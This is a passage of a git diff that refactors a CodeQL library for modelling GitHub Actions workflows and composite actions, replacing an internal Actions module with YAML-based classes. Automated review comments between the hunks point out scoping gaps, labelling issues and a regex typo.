z_gCrUpKzbn&^(qB{T^C`&j$COg++ftep=){0aAI!N6lN%kObX@@#PbTWQOm;Ga6+k2MXy$5-;_1OK$b;ZMX*?d8Yp$nTL% z@qCDX`}BX}ed<^KQ_Tmjo(=DB3;a*GPi?zLbME($rhYcKPc79y0Y9~z{t5W}^>YLM zk9*%!_vXLH-2$G{gPRNFB`lY+#>Q41eN%nt}Z%UM$vU#`_-w$Gu|2Nt9C&;IX knty`4;`(0&`82a8BM$j+O$GtMefVKQ1p%q%dHn7F1A{ntPyhe` literal 0 HcmV?d00001 diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cb561fdf8d1c..096f3b9f8033 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,4 +1,4 @@ -private import codeql.actions.ast.internal.Actions +private import codeql.actions.ast.internal.Yaml private import codeql.Locations /** 
@@ -23,78 +23,142 @@ class AstNode instanceof YamlNode { /** * Gets a environment variable expression by name in the scope of the current node. */ - Expression getEnvExpr(string name) { - exists(Actions::Env env | - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - | - env.(Actions::StepEnv).getStep().getAChildNode*() = this + StringLiteral getEnvVar(string name) { + exists(Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | + env.(StepEnv).getStep().getAChildNode*() = this or - env.(Actions::JobEnv).getJob().getAChildNode*() = this + env.(JobEnv).getJob().getAChildNode*() = this or - env.(Actions::WorkflowEnv).getWorkflow().getAChildNode*() = this + env.(WorkflowEnv).getWorkflow().getAChildNode*() = this ) } } +/** A common class for `env` in workflow, job or step. */ +abstract class Env extends AstNode instanceof YamlMapping { } + +/** A workflow level `env` mapping. */ +class WorkflowEnv extends Env { + Workflow workflow; + + WorkflowEnv() { workflow.(YamlMapping).lookup("env") = this } + + /** Gets the workflow this field belongs to. */ + Workflow getWorkflow() { result = workflow } +} + +/** A job level `env` mapping. */ +class JobEnv extends Env { + Job job; + + JobEnv() { job.(YamlMapping).lookup("env") = this } + + /** Gets the job this field belongs to. */ + Job getJob() { result = job } +} + +/** A step level `env` mapping. */ +class StepEnv extends Env { + Step step; + + StepEnv() { step.(YamlMapping).lookup("env") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } +} + /** - * A composite action + * A custom composite action. This is a mapping at the top level of an Actions YAML action file. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. 
*/ -class CompositeAction extends AstNode instanceof Actions::CompositeAction { - Runs getRuns() { result = super.getRuns() } +class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { + //class CompositeAction extends AstNode, YamlDocument, YamlMapping { + CompositeAction() { + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and + super.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } - Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } + /** Gets the `runs` mapping. */ + Runs getRuns() { result = super.lookup("runs") } - Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Outputs getOutputs() { result = super.lookup("outputs") } - Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } - Input getAnInput() { this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + + Input getAnInput() { super.lookup("inputs").(YamlMapping).maps(result, _) } Input getInput(string name) { - this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + super.lookup("inputs").(YamlMapping).maps(result, _) and result.(YamlString).getValue() = name } } -class Runs extends AstNode instanceof Actions::Runs { - Step getAStep() { result = super.getSteps().getElementNode(_) } +/** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ +class Runs extends AstNode instanceof YamlMapping { + CompositeAction action; + + Runs() { action.(YamlMapping).lookup("runs") = this } + + /** Gets the action that this `runs` mapping is in. 
*/ + CompositeAction getAction() { result = action } - Step getStep(int i) { result = super.getSteps().getElementNode(i) } + /** Gets any steps that are defined within this job. */ + Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } } /** - * A Github Actions Workflow + * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends AstNode instanceof Actions::Workflow { - string getName() { result = super.getName() } +class Workflow extends AstNode instanceof YamlDocument, YamlMapping { + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + YamlMapping getJobs() { result = super.lookup("jobs") } + + /** Gets the 'global' `env` mapping in this workflow. */ + WorkflowEnv getEnv() { result = super.lookup("env") } + + /** Gets the name of the workflow. */ + string getName() { result = super.lookup("name").(YamlString).getValue() } - Job getAJob() { result = super.getJob(_) } + /** Gets the job within this workflow with the given job ID. 
*/ + Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } - Job getJob(string id) { result = super.getJob(id) } + /** Gets a job within this workflow */ + Job getAJob() { result = this.getJob(_) } predicate hasTriggerEvent(string trigger) { - exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(trigger)) } string getATriggerEvent() { - exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(result)) } - Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = super.lookup("permissions") } - Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = super.lookup("strategy") } } -class ReusableWorkflow extends Workflow { +class ReusableWorkflow extends Workflow instanceof YamlMapping { YamlValue workflow_call; - ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } + ReusableWorkflow() { + super.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + } Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } - Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } - Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } 
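Review bot: `Workflow` in this hunk is constrained only by `instanceof YamlDocument, YamlMapping`, so every top-level YAML mapping document in the database (dependabot, docker-compose, any config file) becomes a `Workflow`; the `.github/workflows/*.ya?ml` path filter that the deleted `Actions::Node` applied is not reproduced, while `CompositeAction` in the same hunk does keep its `action.yml`/`action.yaml` check. Unless `AstNode`'s constructor (outside the hunk) restricts files, `getAJob`, `hasTriggerEvent` and `ReusableWorkflow` will be evaluated against unrelated YAML and can yield spurious results. A characteristic predicate mirroring the removed check, e.g. `Workflow() { this.getLocation().getFile().getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") }`, would restore the scope.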
@@ -118,20 +182,22 @@ class Outputs extends AstNode instanceof YamlMapping { /** * Gets an output expression. */ - Expression getAnOutputExpr() { - this.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = result or - this.(YamlMapping).lookup(_) = result + StringLiteral getAnOutput() { + super.lookup(_).(YamlMapping).lookup("value") = result or + super.lookup(_) = result } /** * Gets a specific output expression by name. */ - Expression getOutputExpr(string name) { - this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or - this.(YamlMapping).lookup(name) = result + StringLiteral getOutput(string name) { + super.lookup(name).(YamlMapping).lookup("value") = result or + super.lookup(name) = result } string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } + + override string toString() { result = "Job outputs node" } } class Permissions extends AstNode instanceof YamlMapping { @@ -148,8 +214,8 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - Expression getMatrixVariableExpr(string name) { - this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result + StringLiteral getMatrixVariable(string name) { + super.lookup("matrix").(YamlMapping).lookup(name) = result } string getAMatrixVariableName() { 
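Review bot: The `toString()` added at the end of the `@@ -118` hunk labels every `Outputs` instance `"Job outputs node"`, but `Outputs` is also the type returned by `CompositeAction.getOutputs()` and `ReusableWorkflow.getOutputs()` earlier in this file, so composite-action and reusable-workflow outputs will be printed with a misleading label in query results and path explanations. A neutral string such as `override string toString() { result = "Outputs node" }` avoids that, or the label could be derived from the enclosing node.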
@@ -158,28 +224,61 @@ class Strategy extends AstNode instanceof YamlMapping { } /** - * A Job is a collection of steps that run in an execution environment. + * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Job extends AstNode instanceof Actions::Job { +class Needs extends AstNode { + Job job; + + Needs() { job.(YamlMapping).lookup("needs") = this } + + Job getJob() { result = job } + + Job getANeededJob() { + if this instanceof YamlString + then + result.getId() = this.(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + else + if this instanceof YamlSequence + then + result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + else none() + } +} + +/** + * An Actions job within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +class Job extends AstNode instanceof YamlMapping { + string jobId; + Workflow workflow; + + Job() { this = workflow.getJobs().lookup(jobId) } + /** * Gets the ID of this job, as a string. * This is the job's key within the `jobs` mapping. */ - string getId() { result = super.getId() } + string getId() { result = jobId } + + /** Gets any steps that are defined within this job. */ + Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } /** Gets the step at the given index within this job. */ - Step getStep(int index) { result = super.getStep(index) } + Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } - /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.getStep(_) } + /** Gets the workflow this job belongs to. */ + Workflow getWorkflow() { result = workflow } /** * Gets a needed job. 
* eg: * - needs: [job1, job2] */ - Job getNeededJob() { - exists(Actions::Needs needs | + Job getANeededJob() { + exists(Needs needs | needs.getJob() = this and result = needs.getANeededJob() ) @@ -191,7 +290,11 @@ class Job extends AstNode instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - Outputs getOutputs() { result = this.(Actions::Job).lookup("outputs") } + Outputs getOutputs() { result = super.lookup("outputs") } + + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } /** * Reusable workflow jobs may have Uses children 
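Review bot: The doc comment on the new `Needs` class in the `@@ -158` hunk is only a URL, and `getJob()`/`getANeededJob()` carry none, while the neighbouring `Job` class documents each member. A one-line summary before the link, such as `/** The `needs` field of a job: the job ID, or sequence of job IDs, that must complete before this job runs. */`, plus `/** Gets the job that declares this `needs` field. */` and `/** Gets a job named in this `needs` field, resolved within the same workflow file. */`, would bring it in line. The file-equality check in `getANeededJob()` is what scopes the lookup to a single workflow file; that is worth stating, since job IDs are only unique per file.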
@@ -201,28 +304,38 @@ class Job extends AstNode instanceof Actions::Job { * with: * arg1: value1 */ - JobUses getUses() { result.getJob() = this } + UsesJob getUses() { result.getJob() = this } predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } - If getIf() { result = super.getIf() } + If getIf() { result = super.lookup("if") } + + Permissions getPermissions() { result = super.lookup("permissions") } - Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } + Strategy getStrategy() { result = super.lookup("strategy") } - Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } + override string toString() { result = "Job: " + jobId } } /** - * A Step is a single task that can be executed as part of a job. + * A step within an Actions job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. */ -class Step extends AstNode instanceof Actions::Step { - string getId() { result = super.getId() } +class Step extends AstNode instanceof YamlMapping { + YamlMapping parent; + + Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this } + + /** Gets the ID of this step, if any. */ + string getId() { result = super.lookup("id").(YamlString).getValue() } - Job getJob() { result = super.getJob() } + /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ + Job getJob() { result = parent } - If getIf() { result = super.getIf() } + /** Gets the value of the `if` field in this step, if any. */ + If getIf() { result = super.lookup("if") } } /** @@ -232,7 +345,7 @@ class If extends AstNode { YamlMapping parent; If() { - (parent instanceof Actions::Step or parent instanceof Actions::Job) and + (parent instanceof Step or parent instanceof Job) and parent.lookup("if") = this } 
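Review bot: `Step` in the `@@ -201` hunk accepts any `YamlMapping` that holds a `steps` sequence as its `parent`, so elements of a `steps` list anywhere in a YAML file qualify as steps; the deleted `StepsContainer` limited this to `Job` and `Runs`. The `If` class later in the same hunk constrains its parent explicitly (`parent instanceof Step or parent instanceof Job`), and the same guard would keep `Step` consistent: `Step() { (parent instanceof Job or parent instanceof Runs) and parent.lookup("steps").(YamlSequence).getElementNode(_) = this }`. Without it, `UsesStep`/`Run` matching and any source or sink built on them can fire on YAML that is not an Actions workflow or composite action.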
@@ -249,39 +362,54 @@ abstract class Uses extends AstNode { abstract string getVersion(); - abstract Expression getArgumentExpr(string key); + abstract StringLiteral getArgument(string key); + + override string toString() { result = "Uses Step" } } +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ +private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class StepUses extends Step, Uses { - Actions::Uses uses; +class UsesStep extends Step, Uses { + YamlScalar uses; + + UsesStep() { this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = "uses"), uses) } - StepUses() { uses.getStep() = this } + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + override string getCallee() { + result = + ( + uses.getValue().regexpCapture(usesParser(), 1) + "/" + + uses.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() + } - override string getCallee() { result = uses.getGitHubRepository() } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. 
*/ + override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } - override string getVersion() { - result = uses.getVersion() - or - not exists(uses.getVersion()) and - result = "main" + override StringLiteral getArgument(string key) { + result = this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) } - override Expression getArgumentExpr(string key) { - exists(Actions::With with | - with.getStep() = this and - result = with.lookup(key) - ) + override string toString() { + if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } } /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUses extends Uses instanceof YamlMapping { - JobUses() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } +class UsesJob extends Uses instanceof YamlMapping { + UsesJob() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } Job getJob() { result = this } @@ -297,7 +425,7 @@ class JobUses extends Uses instanceof YamlMapping { override string getCallee() { exists(YamlString name | - this.(YamlMapping).lookup("uses") = name and + super.lookup("uses") = name and if name.getValue().matches("./%") then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else 
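Review bot: `UsesStep.getCallee()` and `getVersion()` in the `@@ -249` hunk only succeed for `owner/repo@ref` values, because `usesParser()` requires both the `/` and the `@`; a step with `uses: ./.github/actions/foo` or `uses: docker://image:tag` therefore has no callee and no version, whereas `UsesJob.getCallee()` in the following hunk handles the `./%` form with `pathUsesParser()`. Queries keyed on `getCallee()` will silently skip local and container actions in steps, which matters for any check that reasons about which action a step runs. If that is intended, the class doc should say so, e.g. `/** ... Local (`./path`) and `docker://` references are not parsed; `getCallee()` and `getVersion()` have no result for them. */`; otherwise mirror the `./%` branch of `UsesJob`.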
@@ -311,72 +439,73 @@ class JobUses extends Uses instanceof YamlMapping { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | - this.(YamlMapping).lookup("uses") = name and + super.lookup("uses") = name and if not name.getValue().matches("\\.%") then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() ) } - override Expression getArgumentExpr(string key) { - this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + override StringLiteral getArgument(string key) { + super.lookup("with").(YamlMapping).lookup(key) = result } } /** - * A Run step represents the evaluation of a provided script + * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step { - Actions::Run scriptExpr; - - Run() { scriptExpr.getStep() = this } - - Expression getScriptExpr() { result = scriptExpr } - - string getScript() { result = scriptExpr.getValue() } -} - -// /** -// * An AST node associated with a Reusable Workflow input. -// */ -// class InputExpr extends AstNode { -// InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } -// } -// -// /** -// * An AST node holding an Env var value. -// */ -// class EnvExpr extends AstNode { -// EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } -// } -// -// /** -// * An AST node holding a job or workflow output var. -// */ -// class OutputExpr extends AstNode { -// OutputExpr() { -// exists(Outputs outputs | -// outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or -// outputs.(YamlMapping).lookup(_) = this -// ) -// } -// } -// -// /** -// * An AST node holding a matrix var. 
-// */ -// class MatrixVariableExpr extends AstNode { -// MatrixVariableExpr() { -// exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) -// } -// } + StringLiteral script; + + Run() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "run"), script) } + + StringLiteral getScript() { result = script } + + override string toString() { + if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" + } +} + +/** + * A YamlString part of a YamlSequence or YamlMapping values. + */ +class StringLiteral extends AstNode instanceof YamlString { + StringLiteral() { + exists(YamlCollection c | + c instanceof YamlMapping and + c.(YamlMapping).maps(_, this) + or + c instanceof YamlSequence and + c.(YamlSequence).getElementNode(_) = this + ) + } + + string getValue() { result = this.(YamlString).getValue() } +} + +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +string getASimpleReferenceExpression(YamlString node) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + node.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) + .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) +} + /** - * Evaluation of a workflow expression ${{}}. + * A StringLiteral containing a workflow expression ${{}}. 
*/ -class Expression extends AstNode instanceof YamlString { +class Expression extends StringLiteral { string expr; - Expression() { expr = Actions::getASimpleReferenceExpression(this) } + Expression() { expr = getASimpleReferenceExpression(this) } string getExpression() { result = expr } @@ -384,7 +513,7 @@ class Expression extends AstNode instanceof YamlString { } /** - * A ${{}} expression accessing a context variable. + * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ class ContextExpression extends Expression { @@ -549,7 +678,7 @@ class EnvExpression extends ContextExpression { override AstNode getTarget() { exists(AstNode s | - s.getEnvExpr(fieldName) = result and + s.getEnvVar(fieldName) = result and s.getAChildNode*() = this ) } @@ -572,12 +701,12 @@ class MatrixExpression extends ContextExpression { override AstNode getTarget() { exists(Workflow w | - w.getStrategy().getMatrixVariableExpr(fieldName) = result and + w.getStrategy().getMatrixVariable(fieldName) = result and w.getAChildNode*() = this ) or exists(Job j | - j.getStrategy().getMatrixVariableExpr(fieldName) = result and + j.getStrategy().getMatrixVariable(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll deleted file mode 100644 index fe10441fd67a..000000000000 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ /dev/null 
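Review bot: The character class in the `regexpCapture` pattern of `getASimpleReferenceExpression` (`\\*\\((\\)\\.\\-]`) contains an extra `(` that the `regexpFind` pattern on the line above does not (`\\*\\(\\)\\.\\-]`). Inside a character class the stray `(` is just a duplicate literal, so matching appears unaffected, but the two patterns are meant to agree and the difference reads as a typo that will drift further on the next edit. Defining the class once, e.g. `private string simpleExprChars() { result = "[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+" }`, and building both patterns from it would remove the duplication. The predicate is carried over from the deleted `Actions.qll`, so the mismatch predates this commit.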
@@ -1,398 +0,0 @@ -/** - * Libraries for modeling GitHub Actions workflow files written in YAML. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ - -import codeql.actions.ast.internal.Yaml -import codeql.files.FileSystem - -/** - * Libraries for modeling GitHub Actions workflow files written in YAML. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ -module Actions { - /** A YAML node in a GitHub Actions workflow or a custom composite action file. */ - private class Node extends YamlNode { - Node() { - exists(File f | - f = this.getLocation().getFile() and - ( - f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or - f.getBaseName() = ["action.yml", "action.yaml"] - ) - ) - } - } - - /** - * A custom composite action. This is a mapping at the top level of an Actions YAML action file. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. - */ - class CompositeAction extends Node, YamlDocument, YamlMapping { - CompositeAction() { - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - this.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" - } - - /** Gets the `runs` mapping. */ - Runs getRuns() { result = this.lookup("runs") } - } - - /** - * An `runs` mapping in a custom composite action YAML. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs - */ - class Runs extends StepsContainer { - CompositeAction action; - - Runs() { action.lookup("runs") = this } - - /** Gets the action that this `runs` mapping is in. */ - CompositeAction getAction() { result = action } - - /** Gets the `using` mapping. */ - Using getUsing() { result = this.lookup("using") } - } - - /** - * The parent class of the class that can contain `steps` mappings. (`Job` or `Runs` currently.) 
- */ - abstract class StepsContainer extends YamlNode, YamlMapping { - /** Gets the sequence of `steps` within this YAML node. */ - YamlSequence getSteps() { result = this.lookup("steps") } - } - - /** - * A `using` mapping in a custom composite action YAML. - */ - class Using extends YamlNode, YamlScalar { - Runs runs; - - Using() { runs.lookup("using") = this } - - /** Gets the `runs` mapping that this `using` mapping is in. */ - Runs getRuns() { result = runs } - } - - /** - * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ - class Workflow extends Node, YamlDocument, YamlMapping { - /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = this.lookup("jobs") } - - /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result = this.lookup("env") } - - /** Gets the name of the workflow. */ - string getName() { result = this.lookup("name").(YamlString).getValue() } - - /** Gets the name of the workflow file. */ - string getFileName() { result = this.getFile().getBaseName() } - - /** Gets the `on:` in this workflow. */ - On getOn() { result = this.lookup("on") } - - /** Gets the job within this workflow with the given job ID. */ - Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } - } - - /** - * An Actions On trigger within a workflow. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#on. - */ - class On extends YamlNode, YamlMappingLikeNode { - Workflow workflow; - - On() { workflow.lookup("on") = this } - - /** Gets the workflow that this trigger is in. */ - Workflow getWorkflow() { result = workflow } - } - - /** A common class for `env` in workflow, job or step. */ - abstract class Env extends YamlNode, YamlMapping { } - - /** A workflow level `env` mapping. 
*/ - class WorkflowEnv extends Env { - Workflow workflow; - - WorkflowEnv() { workflow.lookup("env") = this } - - /** Gets the workflow this field belongs to. */ - Workflow getWorkflow() { result = workflow } - } - - /** A job level `env` mapping. */ - class JobEnv extends Env { - Job job; - - JobEnv() { job.lookup("env") = this } - - /** Gets the job this field belongs to. */ - Job getJob() { result = job } - } - - /** A step level `env` mapping. */ - class StepEnv extends Env { - Step step; - - StepEnv() { step.lookup("env") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * An Actions job within a workflow. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. - */ - class Job extends StepsContainer { - string jobId; - Workflow workflow; - - Job() { this = workflow.getJobs().lookup(jobId) } - - /** - * Gets the ID of this job, as a string. - * This is the job's key within the `jobs` mapping. - */ - string getId() { result = jobId } - - /** - * Gets the ID of this job, as a YAML scalar node. - * This is the job's key within the `jobs` mapping. - */ - YamlString getIdNode() { workflow.getJobs().maps(result, this) } - - /** Gets the human-readable name of this job, if any, as a string. */ - string getName() { result = this.getNameNode().getValue() } - - /** Gets the human-readable name of this job, if any, as a YAML scalar node. */ - YamlString getNameNode() { result = this.lookup("name") } - - /** Gets the step at the given index within this job. */ - Step getStep(int index) { result.getJob() = this and result.getIndex() = index } - - /** Gets the `env` mapping in this job. */ - JobEnv getEnv() { result = this.lookup("env") } - - /** Gets the workflow this job belongs to. */ - Workflow getWorkflow() { result = workflow } - - /** Gets the value of the `if` field in this job, if any. 
*/ - JobIf getIf() { result.getJob() = this } - - /** Gets the value of the `runs-on` field in this job. */ - JobRunson getRunsOn() { result.getJob() = this } - } - - /** - * An `if` within a job. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idif. - */ - class JobIf extends YamlNode, YamlScalar { - Job job; - - JobIf() { job.lookup("if") = this } - - /** Gets the step this field belongs to. */ - Job getJob() { result = job } - } - - /** - * A `runs-on` within a job. - * See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idruns-on. - */ - class JobRunson extends YamlNode, YamlScalar { - Job job; - - JobRunson() { job.lookup("runs-on") = this } - - /** Gets the step this field belongs to. */ - Job getJob() { result = job } - } - - /** - * A step within an Actions job. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. - */ - class Step extends YamlNode, YamlMapping { - int index; - StepsContainer parent; - - Step() { this = parent.getSteps().getElement(index) } - - /** Gets the 0-based position of this step within the sequence of `steps`. */ - int getIndex() { result = index } - - /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ - Job getJob() { result = parent } - - /** Gets the `runs` this step belongs to, if the step belongs to a `runs` in a custom composite action. Has no result if the step belongs to a `job` in a workflow. */ - Runs getRuns() { result = parent } - - /** Gets the value of the `uses` field in this step, if any. */ - Uses getUses() { result.getStep() = this } - - /** Gets the value of the `run` field in this step, if any. */ - Run getRun() { result.getStep() = this } - - /** Gets the value of the `if` field in this step, if any. 
*/ - StepIf getIf() { result.getStep() = this } - - /** Gets the value of the `env` field in this step, if any. */ - StepEnv getEnv() { result = this.lookup("env") } - - /** Gets the ID of this step, if any. */ - string getId() { result = this.lookup("id").(YamlString).getValue() } - } - - /** - * An `if` within a step. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsif. - */ - class StepIf extends YamlNode, YamlScalar { - Step step; - - StepIf() { step.lookup("if") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * The capture groups are: - * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ - private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } - - /** - * A `uses` field within an Actions job step, which references an action as a reusable unit of code. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsuses. - * - * For example: - * ``` - * uses: actions/checkout@v2 - * ``` - * - * Does not handle local repository references, e.g. `.github/actions/action-name`. - */ - class Uses extends YamlNode, YamlScalar { - Step step; - - Uses() { step.lookup("uses") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - - /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. 
